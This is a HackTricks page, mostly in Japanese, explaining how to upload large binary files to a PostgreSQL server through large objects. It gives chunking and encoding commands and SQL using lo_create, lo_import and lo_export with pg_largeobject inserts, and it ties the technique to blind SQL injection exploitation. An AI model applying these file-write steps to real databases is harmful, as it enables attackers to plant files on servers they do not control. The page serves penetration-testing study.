Big Binary Files Upload (PostgreSQL)

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PostgreSQL 大きなオブジェクト

PostgreSQLは、大きなオブジェクトとして知られる構造を提供しており、pg_largeobjectテーブルを介してアクセス可能で、画像やPDF文書などの大きなデータ型を保存するために設計されています。このアプローチは、データをファイルシステムに戻すエクスポートを可能にするため、COPY TO関数よりも有利です。これにより、元のファイルの正確な複製が維持されます。

このテーブル内に完全なファイルを保存するためには、pg_largeobjectテーブルにオブジェクトを作成し（LOIDで識別される）、次にこのオブジェクトに2KBのサイズのデータチャンクを挿入する必要があります。これらのチャンクは、エクスポート機能が正しく動作するために、正確に2KBのサイズであることが重要です（最後のチャンクは例外となる可能性があります）。

バイナリデータを2KBのチャンクに分割するために、次のコマンドを実行できます：

split -b 2048 your_file # Creates 2KB sized files

各ファイルをBase64またはHexにエンコードするには、以下のコマンドを使用できます：

base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line

重要: このプロセスを自動化する際は、2KBのクリアテキストバイトのチャンクを送信することを確認してください。16進数エンコードされたファイルはサイズが倍になるため、チャンクごとに4KBのデータが必要です。一方、Base64エンコードされたファイルは、ceil(n / 3) * 4の式に従います。

大きなオブジェクトの内容は、デバッグ目的で次のコマンドを使用して表示できます:

select loid, pageno, encode(data, 'escape') from pg_largeobject;

Using lo_creat & Base64

バイナリデータを保存するために、最初にLOIDが作成されます:

SELECT lo_creat(-1);       -- Creates a new, empty large object
SELECT lo_create(173454);  -- Attempts to create a large object with a specific OID

精密な制御が必要な状況、例えばBlind SQL Injectionを悪用する場合、lo_createは固定LOIDを指定するために好まれます。

データチャンクは次のように挿入できます:

INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));

大きなオブジェクトを使用後にエクスポートし、潜在的に削除するには：

SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454);  -- Deletes the specified large object

Using lo_import & Hex

lo_import 関数は、大きなオブジェクトのために LOID を作成し、指定するために利用できます：

select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);

オブジェクト作成後、データはページごとに挿入され、各チャンクが2KBを超えないようにします：

update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;

プロセスを完了するために、データがエクスポートされ、大きなオブジェクトが削除されます：

select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454);  -- Deletes the specified large object

制限事項

大きなオブジェクトにはACL（アクセス制御リスト）がある可能性があり、ユーザーが作成したオブジェクトへのアクセスが制限されることがあります。ただし、許可されたACLを持つ古いオブジェクトは、コンテンツの抽出に対して引き続きアクセス可能である場合があります。

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousNetwork - Privesc, Port Scanner and NTLM chanllenge response disclosure NextRCE with PostgreSQL Languages

Last updated 4 months ago

INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64')); INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));